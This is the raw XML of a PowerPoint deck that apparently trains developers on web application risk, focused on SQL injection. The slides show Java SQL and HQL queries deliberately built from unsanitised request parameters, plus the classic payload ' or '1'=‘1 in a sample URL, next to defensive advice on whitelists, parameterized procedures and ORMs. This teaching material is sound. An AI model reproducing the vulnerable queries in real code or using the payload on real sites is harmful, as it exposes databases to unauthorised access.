              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="918043" y="3429000"/>
            <a:ext cx="10876793" cy="1800493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine the overall risk.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76F19628-42E6-45D4-9733-7962021074C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="918043" y="903044"/>
            <a:ext cx="6619875" cy="2295525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2">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3051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5FE88F-B107-4DBF-97F8-7924B144EE04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="918043" y="903044"/>
            <a:ext cx="6535702" cy="2053053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>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9A044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="3134191"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1. Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="918043" y="3429000"/>
            <a:ext cx="10876793" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Example Attack Scenarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scenario #1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> An application uses untrusted data in the construction of the following vulnerable SQL call: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String query = "SELECT * FROM accounts WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("id") + “’”; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scenario #2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g. Hibernate Query Language (HQL)): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HQLQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("FROM accounts WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("id") + "'"); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>In both cases, the attacker modifies the ‘id’ parameter value in their browser to send: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or '1'=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>For example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/accountView?id=' or '1'=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify or delete data, or even invoke stored procedures. </a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1782430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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="3134191"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1. Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA57EA98-29DB-468E-9B7E-887BADA65006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="776080" y="1647825"/>
            <a:ext cx="10401300" cy="4019550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3544311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A044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="3134191" cy="701731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A916BB7-A188-4DBC-BB80-196B2EAC5F36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1047251" y="1815717"/>
            <a:ext cx="10876793" cy="3816429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>Implementing a whitelist </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>All untrusted data should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>be validated against a whitelist of known good values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A whitelist describes what data we know to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>safe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>It’s a very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>explicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>control </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It strictly filters out anything we don’t trust </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A blacklist describes what data we know to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>dangerous </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>It’s a very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>implicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>control </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It assumes anything not on the list will always be safe </a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Use Parameterized Stored procs or an ORM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Use a stored procedure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Use a ORM such as Entity Framework or NHibernate.</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1186795382"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="TITLE SLIDES">
  <a:themeElements>
    <a:clrScheme name="absa">
      <a:dk1>
        <a:srgbClr val="4D4D4D"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="4D4D4D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="DC0032"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FF780F"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="500A28"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="F05A78"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="870A3C"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F52D28"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="DC0032"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="4D4D4D"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Custom 2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solidFill>
            <a:schemeClr val="accent1"/>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0" indent="0" algn="ctr">
          <a:spcBef>
            <a:spcPts val="300"/>
          </a:spcBef>
          <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
          <a:buNone/>
          <a:defRPr sz="1600" dirty="0" err="1"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spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr>
          <a:spcBef>
            <a:spcPts val="300"/>
          </a:spcBef>
          <a:defRPr sz="1600" dirty="0" err="1" smtClean="0">
            <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:custClrLst>
    <a:custClr>
      <a:srgbClr val="DC0032"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F47721"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="500A28"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F05A78"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="870A3C"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F52D28"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="5A4B4B"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F15726"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="AF144B"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="2D2323"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="BE0028"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F0325A"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="640032"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="960528"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="2D2323"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="736464"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="4D4D4D"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="DC0032"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F47721"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="72A309"/>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0062AA"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="008864"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="698BBD"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="77368A"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="0E9E9E"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="00154D"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="4A2767"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="BB8C61"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="006241"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="015083"/>
    </a:custClr>
  </a:custClrLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="CONTENT SLIDES">
  <a:themeElements>
    <a:clrScheme name="absa">
      <a:dk1>
        <a:srgbClr val="4D4D4D"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="4D4D4D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="DC0032"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FF780F"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="500A28"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="F05A78"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="870A3C"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F52D28"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="DC0032"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="4D4D4D"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Custom 2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0" indent="0" algn="ctr">
          <a:spcBef>
            <a:spcPts val="300"/>
          </a:spcBef>
          <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
          <a:buNone/>
          <a:defRPr sz="1600" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Brave Sans" panose="020B0504020101010102"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lgn="l">
          <a:spcBef>
            <a:spcPts val="0"/>
          </a:spcBef>
          <a:defRPr sz="1600" dirty="0" smtClean="0">
            <a:latin typeface="+mn-lt"/>
            <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:custClrLst>
    <a:custClr>
      <a:srgbClr val="DC0032"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F47721"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="500A28"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F05A78"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="870A3C"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F52D28"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="5A4B4B"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F15726"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="AF144B"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="2D2323"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="BE0028"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="F0325A"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="640032"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="960528"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="2D2323"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="736464"/>
    </a:custClr>
    <a:custClr>
      <a:srgbClr val="4D4D4D"/>
    </a:custClr>
    <a:custClr>
